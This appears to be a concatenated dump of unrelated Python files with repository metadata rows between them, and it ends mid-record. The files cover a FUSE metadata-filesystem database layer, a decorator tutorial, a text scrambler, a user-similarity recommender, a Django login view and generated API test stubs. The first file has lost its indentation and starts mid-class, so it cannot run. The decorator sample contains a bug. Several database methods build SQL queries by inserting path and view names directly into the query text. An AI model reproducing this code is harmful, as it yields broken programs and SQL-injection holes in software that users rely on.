SRC_FILENAME_KEY = "src_filename"
SRC_INODE_KEY = "src_inode"
UNKNOWN = "Unknown"
@calltrace_logger
def __init__(self, db_connection, magix=None, current_view_name=None):
"""
opens a sqlite file, does some checks,
creates tables if required.
"""
try:
db_type, user, password, host, database = \
re.match(r'(\S+)://(?:(.*?):(.*?))?(?:@(.*?)/)?(.*)', db_connection).groups()
except AttributeError:
# make sqlite3 with path the default
if os.path.exists(db_connection) or os.path.isdir(os.path.dirname(db_connection)):
db_type = "sqlite3"
user = host = password = None
database = db_connection
else:
sys.stderr.write("Cannot parse db-connection string.\n")
sys.exit(1)
try:
db_module = import_module("Libfs.%s_be" % db_type)
self.DB_BE = db_module.db_backend()
except ImportError:
sys.stderr.write("Sorry, database type %s not supported.\n" % db_type)
sys.exit(2)
# check if we can open the database at all.
self.DB_BE.open(user, password, host, database)
# check if the db contains all required tables
if not self.check_db(): # do the table exist?
do_setup_db = True
# since we are creating the db, the default view must be DEFAULT_VIEW_NAME
assert current_view_name in [self.DEFAULT_VIEW_NAME, None]
else:
do_setup_db = False
if magix is None:
self.magix = self.get_magix_from_db()
else:
self.magix = magix
if current_view_name is None:
self.current_view_name = self.DEFAULT_VIEW_NAME
self.current_view = self.magix["default_view"]
else:
self.current_view_name = current_view_name
self.current_view = self.get_view(self.current_view_name)
self.setup_filename_parsing()
if do_setup_db:
self.setup_db()
self.metadata_plugin = import_module("Libfs.plugins.%s" % (self.magix["plugin"]))
self.ordered_files_keys = self.DB_BE.get_columns(self.FILES_TABLE)
self.check_tables()
LOGGER.debug("init: self.current_view = %s", self.current_view)
self.max_dir_level = len(self.current_view["dirtree"])
# in-memory cache for bookkeeping
self.vdirs = []
self.vtree = self.generate_vtree()
# still in operations
# pinode_fn2srcpath_map
@calltrace_logger
def lookup_dir(self, vpath):
"""
return inode number of a vdir in the db
"""
@calltrace_logger
def do_lookup_dir(vtree, vpath_list, result):
"""
recursive function to walk through the
directory-levels i.e. db-keys
"""
LOGGER.debug("do_lookup_dir: vtree=%s vpath_list=%s, result=%s",
vtree, vpath_list, result)
if isinstance(vpath_list, str):
LOGGER.debug("do_lookup_dir: encountered string.-> returning true")
return result
if len(vpath_list) == 0:
LOGGER.debug("do_lookup_dir: vpath_list empty.")
return True
if vpath_list[0] in vtree.keys():
return do_lookup_dir(vtree[vpath_list[0]], vpath_list[1:], result)
else:
return False
if do_lookup_dir(self.vtree, get_vpath_list(vpath), True):
result = self.get_vdir_inode(vpath)
else:
result = False
return result
@calltrace_logger
def seek_vtree(self, vpath="", vpath_list=None):
"""
check, if a given vpath or vpath_list does actually exists.
"""
def do_seek_vtree(vtree, vpath_list):
"""
recursive fct to walk through the db by the current_view
"""
if len(vpath_list) == 0:
return vtree
if vpath_list[0] in vtree.keys():
return do_seek_vtree(vtree[vpath_list[0]], vpath_list[1:])
else:
sys.stderr.write("Internal Error: cannot find %s in vtree %s.\n" %
(vpath_list, vtree))
return False
if vpath != "":
vpath_list = get_vpath_list(vpath)
if vpath_list is None:
return self.vtree
if len(vpath_list) > self.max_dir_level:
raise RuntimeError("seek_vtree: len(vpath_list=%s) > self.max_dir_level=%s",
vpath_list, self.max_dir_level)
result = do_seek_vtree(self.vtree, vpath_list)
if not result:
sys.stderr.write("Internal Error: cannot find %s or %s in vtree.\n" %
(vpath, vpath_list))
return result
@calltrace_logger
def mkdir(self, vpath):
"""
add dir to vtree. It stays only in memory and will only be commited to the
db whenever a file is actually moved there.
"""
vpath_list = get_vpath_list(vpath)
dir_level = len(vpath_list) - 1
LOGGER.debug("mkdir: vpath_list=%s, dir_level=%s", vpath, dir_level)
# check validity of new metadata
key = self.current_view["dirtree"][dir_level]
value = vpath_list[-1]
LOGGER.debug("checking key=\"%s\", value=\"%s\"", key, value)
if not self.metadata_plugin.is_valid_metadata(key, value):
return -errno.EINVAL
# add this directory in the in-memory structures
LOGGER.debug("vpath_list[:-1]=%s", vpath_list[:-1])
LOGGER.debug("vtree=%s", self.vtree)
this_vtree = self.seek_vtree(vpath_list=vpath_list[:-1])
vnode = self.get_vdir_inode(vpath)
this_vtree[vpath_list[-1]] = {}
return vnode
@calltrace_logger
def rmdir(self, vpath):
"""
remove a directory from the vpath.
Throw an exception if dir is not empty
"""
contents = self.get_contents_by_vpath(vpath)
if len(contents) > 2:
raise FUSEError(errno.ENOTEMPTY)
return
@calltrace_logger
def get_vdir_inode(self, canon_path):
"""
put vpath in a module-local cache
"""
if not canon_path in self.vdirs:
self.vdirs.append(canon_path)
vnode = self.vdirs.index(canon_path) + 1
return vnode
@calltrace_logger
def walk_vtree(self, node):
"""
iterate tree in pre-order depth-first search order
"""
yield node
for child in node.children:
for item in self.walk_vtree(child):
yield item
@calltrace_logger
def get_magix_from_db(self):
"""
read the magic constants from the db
"""
res = self.DB_BE.execute_statment("select %s from %s" %
(self.MAGIX_FIELD, self.MAGIX_TABLE))
res = res[0][0]
magix = json.loads(res)
LOGGER.debug("magix=%s", magix)
return magix
@calltrace_logger
def setup_db(self):
"""
creates a new db.
Creates tables "views" and "files"
Sets defaults views.
"""
self.DB_BE.execute_statment("create table %s ('%s' text)" %
(self.MAGIX_TABLE, self.MAGIX_FIELD))
self.DB_BE.execute_statment("insert into %s (%s) values('%s')" %
(self.MAGIX_TABLE, self.MAGIX_FIELD, json.dumps(self.magix)))
self.DB_BE.execute_statment("create table %s (name varchar unique, json text)" %
(self.VIEWS_TABLE))
self.DB_BE.execute_statment("insert into %s (name, json) values ('%s', '%s')" %
(self.VIEWS_TABLE, self.DEFAULT_VIEW_NAME,
json.dumps(self.current_view)))
self.DB_BE.execute_statment("create table %s (%s varchar unique, %s integer unique, %s)" %
(self.FILES_TABLE, self.SRC_FILENAME_KEY, self.SRC_INODE_KEY,
",".join(self.magix["valid_keys"])))
self.DB_BE.commit()
return
@calltrace_logger
def generate_vtree(self):
"""
generate a dict representing the tree in the current view
"""
def build_dict(vtree, tpl):
"""
internal recursvie helper function
"""
LOGGER.debug("build_vtree: %s %s", vtree, tpl)
if len(tpl) == 0:
return
if not tpl[0] in vtree.keys():
vtree[tpl[0]] = {}
build_dict(vtree[tpl[0]], tpl[1:])
return vtree
self.vtree = {}
res = self.DB_BE.execute_statment("SELECT DISTINCT %s from %s;" %
(",".join(self.current_view["dirtree"]),
self.FILES_TABLE))
for tpl in res:
self.vtree = build_dict(self.vtree, tpl)
return
@calltrace_logger
def check_db(self):
"""
checks tables for exinstance.
"""
# get tables
res = self.DB_BE.execute_statment("SELECT name FROM sqlite_master WHERE type='table';")
tables = [tpl[0] for tpl in res]
for _tab in [self.VIEWS_TABLE, self.FILES_TABLE]:
if not _tab in tables:
return False
return True
@calltrace_logger
def check_tables(self):
"""
check tables in database for validity.
"""
# check FILES_TABLE for valid_keys
for k in [self.SRC_FILENAME_KEY, self.SRC_INODE_KEY]:
if not k in self.ordered_files_keys:
sys.stderr.write("Internal Error: Mandatory key %s does not exist in db %s.\n" %
(k, self.DB_BE))
sys.stderr.write("Delete and recreate the library.\n")
sys.exit(1)
LOGGER.debug("self.ordered_keys=%s", self.ordered_files_keys)
LOGGER.debug("self.magix[valid_keys]=%s", self.magix["valid_keys"])
for k in self.ordered_files_keys:
if k in [self.SRC_FILENAME_KEY, self.SRC_INODE_KEY]:
continue
if not k in self.magix["valid_keys"]:
sys.stderr.write("Internal Error: Key %s is not valid.\n" % k)
sys.stderr.write("Did you choose the right library-type ?\n")
sys.stderr.write("Otherwise delete and recreate the library.\n")
sys.exit(1)
for k in self.magix["valid_keys"]:
if not k in self.ordered_files_keys:
sys.stderr.write("Internal Error: Valid key %s does not exist in db %s.\n" %
(k, self.DB_BE))
sys.stderr.write("Did you choose the right library-type ?\n")
sys.stderr.write("Otherwise delete and recreate the library.\n")
sys.exit(1)
return
@calltrace_logger
def is_vdir(self, path):
"""
return true if we have a virtual directory
"""
# path must be canonicalized: start with a single /
vpath_list = get_vpath_list(path)
if len(vpath_list) > self.max_dir_level:
return False
LOGGER.debug("is_vdir: returning True")
return True
@calltrace_logger
def get_key_of_vpath(self, vpath):
"""
return the db field-name of this vpath
"""
vpath_list = get_vpath_list(vpath)
return self.current_view["dirtree"][len(vpath_list)]
@calltrace_logger
def add_entry(self, src_filename, metadata):
"""
Adds a file-entry.
"""
src_statinfo = os.stat(src_filename)
metadata[self.SRC_FILENAME_KEY] = src_filename
metadata[self.SRC_INODE_KEY] = src_statinfo.st_ino
LOGGER.debug("metadata=%s", metadata)
values = []
for k in self.ordered_files_keys:
try:
values.append("%s" % metadata.get(k, self.UNKNOWN))
except:
sys.stderr.write("Ignoring Key %s, Values %s is not a string."\
% (k, (metadata[k],)))
# changing a list within a loop over itself,
# huuu, but this should work
for i, item in enumerate(values):
if len(item) == 0:
values[i] = self.UNKNOWN
values_param_str = ",".join(["?" for x in values])
try:
LOGGER.debug("ordered_files_keys = %s", self.ordered_files_keys)
query_str = "INSERT INTO %s VALUES (%s)" % (self.FILES_TABLE, values_param_str)
self.DB_BE.execute_statment(query_str, *values)
except self.DB_BE.IntegrityError:
update_str = ""
for k in self.ordered_files_keys:
update_str += "%s=?, " % (k)
update_str = update_str[:-2]
values.append(src_filename)
query_str = "UPDATE %s SET %s WHERE src_filename=?" % (self.FILES_TABLE, update_str)
self.DB_BE.execute_statment(query_str, *values)
self.DB_BE.commit()
# revert modifications to metadata
metadata.pop(self.SRC_FILENAME_KEY)
metadata.pop(self.SRC_INODE_KEY)
return
@calltrace_logger
def remove_entry(self, src_filename):
"""
removes a file-entry
"""
self.DB_BE.execute_statment("DELETE from %s WHERE src_filename=?" %
(self.FILES_TABLE), src_filename)
self.DB_BE.commit()
return
@calltrace_logger
def get_entry(self, src_filename):
"""
returns the metadata to a src_filename
"""
try:
query_str = "SELECT %s FROM %s WHERE src_filename=?;" % \
(",".join(["?" for x in self.ordered_files_keys]), self.FILES_TABLE)
res = self.DB_BE.execute_statment(query_str, self.ordered_files_keys, src_filename)
return res[0]
except IndexError:
return None
@calltrace_logger
def update_column(self, old_vpath_list, new_vpath_list):
"""
when renaming a vdir, we have to update all concerned rows
"""
assert len(old_vpath_list) == len(new_vpath_list)
assert old_vpath_list != new_vpath_list
where = ""
update = ""
for i, old_item in enumerate(old_vpath_list):
new_item = new_vpath_list[i]
LOGGER.debug("comparing old %s to new %s", old_item, new_item)
where += "%s='%s' AND " % (self.current_view["dirtree"][i], old_item)
if old_item != new_item:
update += "%s='%s', " % (self.current_view["dirtree"][i], new_item)
where = where[:-len("AND ")]
update = update[:-len(", ")]
self.DB_BE.execute_statment("UPDATE %s set %s WHERE %s" % (self.FILES_TABLE, update, where))
self.DB_BE.commit()
return
@calltrace_logger
def get_view(self, view_name):
"""
returns the order in which virtual directories
are created.
"""
try:
res = self.DB_BE.execute_statment("select name, json from %s WHERE name='%s';" %
(self.VIEWS_TABLE, view_name))
return json.loads(res[0])
except IndexError:
return None
return
@calltrace_logger
def set_view(self, view_name, view):
"""
sets directory creation order
"""
# check if dirtree is valid
for subdir in view["dirtree"]:
if not subdir in self.magix["valid_keys"]:
raise RuntimeError("set_view: Key %s is not valid." % subdir)
self.DB_BE.execute_statment("insert into %s (name, json) values (%s, '%s')" %
(self.VIEWS_TABLE, view_name, json.dumps(view)))
self.DB_BE.commit()
return
@calltrace_logger
def get_all_src_names(self):
"""
return list of all src_names in db
"""
res = self.DB_BE.execute_statment("SELECT %s FROM %s;" %
(self.SRC_FILENAME_KEY, self.FILES_TABLE))
return [tpl[0] for tpl in res]
@calltrace_logger
def get_srcfilename_by_srcinode(self, inode):
"""
return src_filename
"""
res = self.DB_BE.execute_statment("SELECT %s FROM %s WHERE %s=%s;" %
(self.SRC_FILENAME_KEY, self.FILES_TABLE,
self.SRC_INODE_KEY, inode))
return res[0][0]
@calltrace_logger
def get_vpath_dict(self, vpath):
"""
get a dict view_level = path
"""
vpath_dict = {}
vpath_list = get_vpath_list(vpath)
for i, item in enumerate(vpath_list):
vpath_dict[self.current_view["dirtree"][i]] = item
LOGGER.debug("get_vpath_dict: %s -> %s", vpath, vpath_dict)
return vpath_dict
#
# actually used for FUSE
#
def get_gen_filename(self, src_filename):
"""
generate a virtual filename
"""
gen_fn = self.current_view["fn_gen"]
gen_fn = gen_fn.replace("%{src_filename}", os.path.basename(src_filename))
query_str = "SELECT %s FROM %s WHERE src_filename=?;" % \
(",".join(self.magix["valid_keys"]), self.FILES_TABLE)
res = self.DB_BE.execute_statment(query_str, src_filename)
all_file_keys = res[0]
LOGGER.debug("get_gen_filename src_filename:%s all_file_keys:%s",
src_filename, all_file_keys)
for i, item in enumerate(self.magix["valid_keys"]):
gen_fn = gen_fn.replace("%%{%s}" % (item), all_file_keys[i])
return gen_fn
def setup_filename_parsing(self):
"""
compile the regular expression for the filename parsing
"""
i = 0
inside_key = False
this_key = ""
self.fn_gen_keys = []
fn_generator = self.current_view["fn_gen"]
reg_ex = ""
# create a regex and key mapping
while i < len(fn_generator):
if inside_key:
if fn_generator[i] == "}":
inside_key = False
self.fn_gen_keys.append(this_key)
else:
this_key += fn_generator[i]
i += 1
continue
if fn_generator[i] == "%":
try:
if fn_generator[i+1] == "{":
inside_key = True
i += 2
this_key = ""
reg_ex += "(.*)"
continue
except IndexError:
pass
reg_ex += fn_generator[i]
i += 1
self.fn_regex = re.compile(reg_ex)
return
@calltrace_logger
def get_metadata_from_gen_filename(self, gen_filename):
"""
return a metadata-dict from a virtual filename
"""
try:
values = self.fn_regex.match(gen_filename).groups()
except AttributeError:
raise RuntimeError("get_metadata_from_gen_filename: "\
"Given filename does not match pattern %s" % self.fn_regex.pattern)
if len(values) != len(self.fn_gen_keys):
raise RuntimeError("get_metadata_from_gen_filename: "\
"Given filename match pattern %s, but gives incorrect number of items."\
"keys %s != values %s" % (self.fn_regex.pattern, self.fn_gen_keys, values))
fn_metadata = {}
for i, item in enumerate(self.fn_gen_keys):
fn_metadata[item] = values[i]
return fn_metadata
@calltrace_logger
def get_contents_by_vpath(self, vpath):
"""
returns contents of virtual directory
files are only returned and the very leaf of the current_view
duplicate files have a (libfs:%d) counter appended on the spot.
"""
LOGGER.debug("get_contents_by_vpath got vpath: %s", vpath)
vpath_list = get_vpath_list(vpath)
dir_level = len(vpath_list)
LOGGER.debug("get_contents_by_vpath got tokens: %s", vpath_list)
contents = []
# add "." and ".." entries
vnode = self.get_vdir_inode(vpath)
contents.append((vnode, ".", None))
if dir_level > 0:
upper_vpath = "/".join(vpath_list[:-1])
vnode = self.get_vdir_inode(upper_vpath)
contents.append((vnode, "..", None))
else:
contents.append((-1, "..", "MOUNTPOINT_PARENT"))
# we are at the end of the tree
if dir_level == self.max_dir_level:
where = ""
for i, item in enumerate(vpath_list):
where += "%s='%s' AND " % (self.current_view["dirtree"][i], item)
where = where[:-len("AND ")]
res = self.DB_BE.execute_statment("SELECT src_inode, src_filename FROM %s WHERE %s;" %
(self.FILES_TABLE, where))
file_name_occurrences = {}
for src_inode, src_filename in res:
file_vname = self.get_gen_filename(src_filename)
if file_vname in file_name_occurrences:
file_name_occurrences[file_vname] += 1
file_vname = "%s (libfs:%d)" % (file_vname, file_name_occurrences[file_vname])
else:
file_name_occurrences[file_vname] = 0
contents.append((src_inode, file_vname, src_filename))
else: # in vtree
for val in self.seek_vtree(vpath_list=vpath_list):
# path within a vdir must not be empty,
# otherwise it is assinged to the dirvnode of the parent vdir
assert len(val) > 0
contents.append((self.get_vdir_inode(os.path.join(vpath, val)), val, None))
LOGGER.debug("get_contents_by_vpath returning: %s", contents)
# return vnode for contents
return contents
def get_inode_by_srcfilename(self, src_filename):
"""
return the inode from a src_filename, callend by rename
"""
res = self.DB_BE.execute_statment("SELECT src_inode FROM %s WHERE src_filename=?;" %
(self.FILES_TABLE), src_filename)
LOGGER.debug("result = %s", res)
assert len(res) == 1
return res[0][0]
| [
"github@induhviduals.de"
] | github@induhviduals.de |
4c347ae94d9df24fec3759a199a0f5795a7415fb | 3cc54ff99710605d1a142c82ca06111ad31ea544 | /Decorators.py | 46060cc330b64e15e020f3324368e3226bec8892 | [] | no_license | tombstoneghost/Python_Advance | 90caab5ca713ef928761ef5636718032f37c2037 | 45b936abd6ad76c7980dd32dabebfb81f24fd6ee | refs/heads/main | 2023-02-07T05:09:53.698323 | 2020-12-25T12:16:00 | 2020-12-25T12:16:00 | 323,593,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,082 | py | # Working with Decorators in Python
import functools
# Function Decorator
"""
@myDecorator
def doSomething():
pass
"""
def start_end_decorator(func):
def wrapper():
print('Start')
func()
print('End')
return wrapper()
def argument_decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
print('Start')
res = func(*args, **kwargs)
print('End')
return res
return wrapper
@start_end_decorator
def print_name():
print('Alex')
print_name
# Function has some arguments
@argument_decorator
def add5(x):
return x + 5
result = add5(10)
print(result)
# Print Help of a Decorator
print(help(add5))
# Class Decorator
class CountCalls:
def __init__(self, func):
self.func = func
self.num_calls = 0
def __call__(self, *args, **kwargs):
self.num_calls += 1
print(f'This is executed {self.num_calls} times')
return self.func(*args, **kwargs)
@CountCalls
def say_hello():
print('Hello')
say_hello()
say_hello()
say_hello()
| [
"simardeepsngh1@gmail.com"
] | simardeepsngh1@gmail.com |
23317031f4c072188b2260f3b40f58570d283aa1 | 537d2b8b23f539069d3c01aa78744086bcc88bbd | /deleteme.py | 936aaddf14f5c9e5707f542ae1131005e7ca923b | [] | no_license | michaelstreeter101/AliensAboutHumans | 2190341d9a49ad96765b72931561fac0b239c0ab | ab3b134d236a9a658b0831dc560f28226fc799bd | refs/heads/main | 2023-01-31T03:16:53.974084 | 2020-12-09T12:32:26 | 2020-12-09T12:32:26 | 319,941,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,526 | py | # Author: MWS
# Date: 2020-12-09
# Purpose: takes text typed in and converts it according to rules
# "couldnt believe that I could actually understand what I was reading" becomes
# "cdnuolt blveiee taht I cluod aulaclty uesdnatnrd waht I was rdanieg" (or similar!)
#
def shift4( w ):
# takes 4 letters and returns 4 letters scrambled. e.g. nder begomes rend
return w[3]+w[2]+w[0]+w[1]
def shift3( w ):
# takes 3 letters and returns 3 letters scrambled. e.g. oul becomes ulo
return w[1]+w[2]+w[0]
def shift2( w ):
# takes 2 letters and returns 2 letters swapped. e.g. ha becomes ah
return w[1]+w[0]
# Main function
print( 'Type a sentence' )
string = input() #string = 'This is a sentence.'
# work through the sentence, character by character,
# whenever you get to a word boundary (' ' or '.'),
# output the first letter, scrambled innards, last letter, boundary character.
# Rinse and repeat until you get to the end of the line.
word=''
for char in string:
word += char # add the next character to the word
if ord( char ) in (32, 46): # if it's ' ' or '.' print the word
terminator = char
word = word[0:-1] # strip the terminator character off the word
if len( word ) <= 3:
print( word, end='' ) # short words (I, am, the) go through unprocessed.
print( terminator, end='' )
word = ''
else: # len( word ) > 3
first = word[0] # first letter (has to remain in the same place)
mid = word[1:-1] # middle part of the word (will get scrambled)
last = word[-1:] # last letter (has to remain in the same place)
print( first, end='' )
# Scramble mid
t = len( mid )
#print( f'{t} = ', end='' )
while t > 0:
if t >=4:
dim = mid[t-4:t] # 'dim' is 'mid' rearranged
print( shift4( dim ), end='' )
t -= 4
if t >=3:
dim = mid[t-3:t]
print( shift3( dim ), end='' )
t -= 3
elif t >= 2:
dim = mid[t-2:t]
print( shift2( dim ), end='' )
t -= 2
elif t >= 1:
print( mid[t-1:t], end='' )
t -= 1
print( last, end='' )
print(terminator, end='')
word = ''
# Follow Aliens About Humans, @HumansExplained
| [
"noreply@github.com"
] | michaelstreeter101.noreply@github.com |
3f7dfa2439a9739f576b579721203f0a4695ae32 | e91438a38248b8c6d584617442d4494d3a36bbd9 | /server/recommendation/practice/practiceRecommendationEngine.py | 3c5d03574b541f78b75466ebf74d8a0d0833f424 | [] | no_license | Jisu-Lee/SmartVendingMachine | 85ba781be4d88ddef39b672e4ef61a22ae7eed09 | a3b538b66869911d7dcb862ce7e7c067fb57c0e4 | refs/heads/master | 2022-01-16T17:32:20.941483 | 2018-12-02T12:36:21 | 2018-12-02T12:36:21 | 151,395,001 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,872 | py | from dataSet_testRecommend import dataset
from math import sqrt
def pearson_correlation(person1,person2):
# To get both rated items
both_rated = {}
for item in dataset[person1]:
if item in dataset[person2]:
both_rated[item] = 1
number_of_ratings = len(both_rated)
# Checking for number of ratings in common
if number_of_ratings == 0:
return 0
# Add up all the preferences of each user
person1_preferences_sum = sum([dataset[person1][item] for item in both_rated])
person2_preferences_sum = sum([dataset[person2][item] for item in both_rated])
# Sum up the squares of preferences of each user
person1_square_preferences_sum = sum([pow(dataset[person1][item],2) for item in both_rated])
person2_square_preferences_sum = sum([pow(dataset[person2][item],2) for item in both_rated])
# Sum up the product value of both preferences for each item
product_sum_of_both_users = sum([dataset[person1][item] * dataset[person2][item] for item in both_rated])
# Calculate the pearson score
numerator_value = product_sum_of_both_users - (person1_preferences_sum*person2_preferences_sum/number_of_ratings)
denominator_value = sqrt((person1_square_preferences_sum - pow(person1_preferences_sum,2)/number_of_ratings) * (person2_square_preferences_sum -pow(person2_preferences_sum,2)/number_of_ratings))
if denominator_value == 0:
return 0
else:
r = numerator_value/denominator_value
return r
def most_similar_users(person,number_of_users):
# returns the number_of_users (similar persons) for a given specific person.
scores = [(pearson_correlation(person,other_person),other_person) for other_person in dataset if other_person != person ]
# Sort the similar persons so that highest scores person will appear at the first
scores.sort()
scores.reverse()
return scores[0:number_of_users]
def user_reommendations(person):
# Gets recommendations for a person by using a weighted average of every other user's rankings
totals = {}
simSums = {}
for other in dataset:
# don't compare me to myself
if other == person:
continue
sim = pearson_correlation(person,other)
#print ">>>>>>>",sim
# ignore scores of zero or lower
if sim <=0:
continue
for item in dataset[other]:
# only score movies i haven't seen yet
if item not in dataset[person] or dataset[person][item] == 0:
# Similrity * score
totals.setdefault(item,0)
totals[item] += dataset[other][item]* sim
# sum of similarities
simSums.setdefault(item,0)
simSums[item]+= sim
# Create the normalized list
rankings = [(total/simSums[item],item) for item,total in totals.items()]
rankings.sort()
rankings.reverse()
# returns the recommended items
recommendataions_list = [recommend_item for score,recommend_item in rankings]
return recommendataions_list
print(most_similar_users('Toby',5))
print(user_reommendations('Toby')) | [
"ehdwlsdnwls@naver.com"
] | ehdwlsdnwls@naver.com |
7260139647985caede41928b35165251d428ceab | d6e7364579d78b5d0ba3145394234f304adfd17c | /login_app/views.py | a17109285a1774da3ded4fcd1d9413121a37ee66 | [] | no_license | jassami/Dojo_Read | 6a5291c712d921ef876dd3a6bc49380392e5093a | 7badf51e4d53b350a86473c021efca0057e7a177 | refs/heads/main | 2023-06-02T07:21:20.612034 | 2021-06-19T15:15:48 | 2021-06-19T15:15:48 | 378,441,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,943 | py | from django.shortcuts import redirect, render
from .models import User
from django.contrib import messages
import bcrypt
def index(request):
return render(request, 'index.html')
def register(request):
errors = User.objects.register_validator(request.POST)
request.session['send']= "register"
if errors:
for k, v in errors.items():
messages.error(request, v)
return redirect('/')
else:
request.session['alias']= request.POST['alias']
pw_hash= bcrypt.hashpw(request.POST['password'].encode(), bcrypt.gensalt()).decode()
print(pw_hash)
user= User.objects.create(name= request.POST['name'], alias=request.POST['alias'], birthday= request.POST['birthday'], email= request.POST['email'], password= pw_hash)
request.session['user_id'] = user.id
request.session['send'] = "registered"
return redirect('/books')
def login(request):
if request.method == "POST":
errors = User.objects.login_validator(request.POST)
request.session['send']= "login"
if errors:
for k, v in errors.items():
messages.error(request, v)
return redirect('/')
else:
log_user= User.objects.filter(email=request.POST['email'])
if len(log_user) != 1:
return redirect('/')
if log_user:
user= log_user[0]
request.session['alias'] = user.alias
if bcrypt.checkpw(request.POST['password'].encode(), user.password.encode()):
request.session['user_id']= user.id
print(request.POST)
request.session['send'] = "logged in"
return redirect('/books')
else:
return redirect('/')
def success(request):
return render(request, 'success.html')
def logout(request):
request.session.clear()
return redirect('/')
| [
"jassami1@hotmail.com"
] | jassami1@hotmail.com |
48c663aa2a5710c161b3eb746a960ff8252ec051 | 709b1549033c9a547c67ee507fdc10b7e5d234ad | /test/test_worker_pools_api.py | a9689158dab784197bf9245cf0d64ca7dd1eb230 | [
"Apache-2.0"
] | permissive | cvent/octopus-deploy-api-client | d622417286b348c0be29678a86005a809c77c005 | 0e03e842e1beb29b132776aee077df570b88366a | refs/heads/master | 2020-12-05T14:17:46.229979 | 2020-01-07T05:06:58 | 2020-01-07T05:06:58 | 232,135,963 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,971 | py | # coding: utf-8
"""
Octopus Server API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 2019.6.7+Branch.tags-2019.6.7.Sha.aa18dc6809953218c66f57eff7d26481d9b23d6a
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import octopus_deploy_swagger_client
from octopus_deploy_client.worker_pools_api import WorkerPoolsApi # noqa: E501
from octopus_deploy_swagger_client.rest import ApiException
class TestWorkerPoolsApi(unittest.TestCase):
"""WorkerPoolsApi unit test stubs"""
def setUp(self):
self.api = octopus_deploy_client.worker_pools_api.WorkerPoolsApi() # noqa: E501
def tearDown(self):
pass
def test_create_response_descriptor_worker_pools_worker_pool_worker_pool_resource(self):
"""Test case for create_response_descriptor_worker_pools_worker_pool_worker_pool_resource
Create a WorkerPoolResource # noqa: E501
"""
pass
def test_create_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces(self):
"""Test case for create_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces
Create a WorkerPoolResource # noqa: E501
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_sort_worker_pools_responder(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_sort_worker_pools_responder
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_sort_worker_pools_responder_spaces(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_sort_worker_pools_responder_spaces
"""
pass
def test_custom_query_response_descriptor_octopus_server_web_api_actions_infrastructure_summary_worker_pools_summary_responder(self):
"""Test case for custom_query_response_descriptor_octopus_server_web_api_actions_infrastructure_summary_worker_pools_summary_responder
"""
pass
def test_custom_query_response_descriptor_octopus_server_web_api_actions_infrastructure_summary_worker_pools_summary_responder_spaces(self):
"""Test case for custom_query_response_descriptor_octopus_server_web_api_actions_infrastructure_summary_worker_pools_summary_responder_spaces
"""
pass
def test_custom_query_response_descriptor_octopus_server_web_api_actions_worker_pools_workers_responder(self):
"""Test case for custom_query_response_descriptor_octopus_server_web_api_actions_worker_pools_workers_responder
"""
pass
def test_custom_query_response_descriptor_octopus_server_web_api_actions_worker_pools_workers_responder_spaces(self):
"""Test case for custom_query_response_descriptor_octopus_server_web_api_actions_worker_pools_workers_responder_spaces
"""
pass
def test_delete_on_background_response_descriptor_worker_pools_worker_pool_worker_pool_resource(self):
"""Test case for delete_on_background_response_descriptor_worker_pools_worker_pool_worker_pool_resource
Delete a WorkerPoolResource by ID # noqa: E501
"""
pass
def test_delete_on_background_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces(self):
"""Test case for delete_on_background_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces
Delete a WorkerPoolResource by ID # noqa: E501
"""
pass
def test_index_response_descriptor_worker_pools_worker_pool_worker_pool_resource(self):
"""Test case for index_response_descriptor_worker_pools_worker_pool_worker_pool_resource
Get a list of WorkerPoolResources # noqa: E501
"""
pass
def test_index_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces(self):
"""Test case for index_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces
Get a list of WorkerPoolResources # noqa: E501
"""
pass
def test_list_all_response_descriptor_worker_pools_worker_pool_worker_pool_resource(self):
"""Test case for list_all_response_descriptor_worker_pools_worker_pool_worker_pool_resource
Get a list of WorkerPoolResources # noqa: E501
"""
pass
def test_list_all_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces(self):
"""Test case for list_all_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces
Get a list of WorkerPoolResources # noqa: E501
"""
pass
def test_load_response_descriptor_worker_pools_worker_pool_worker_pool_resource(self):
"""Test case for load_response_descriptor_worker_pools_worker_pool_worker_pool_resource
Get a WorkerPoolResource by ID # noqa: E501
"""
pass
def test_load_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces(self):
"""Test case for load_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces
Get a WorkerPoolResource by ID # noqa: E501
"""
pass
def test_modify_response_descriptor_worker_pools_worker_pool_worker_pool_resource(self):
"""Test case for modify_response_descriptor_worker_pools_worker_pool_worker_pool_resource
Modify a WorkerPoolResource by ID # noqa: E501
"""
pass
def test_modify_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces(self):
"""Test case for modify_response_descriptor_worker_pools_worker_pool_worker_pool_resource_spaces
Modify a WorkerPoolResource by ID # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
| [
"d.jain@cvent.com"
] | d.jain@cvent.com |
dd65e49ac4e5d72ad391c44fe86fbec7470da58a | 754f71f70dfd6a22944d8d872c6d2f1d6983ac14 | /sensirion_shdlc_driver/device.py | 26dc53bb4e13555ba24e995327b14f5e2a84b6c7 | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
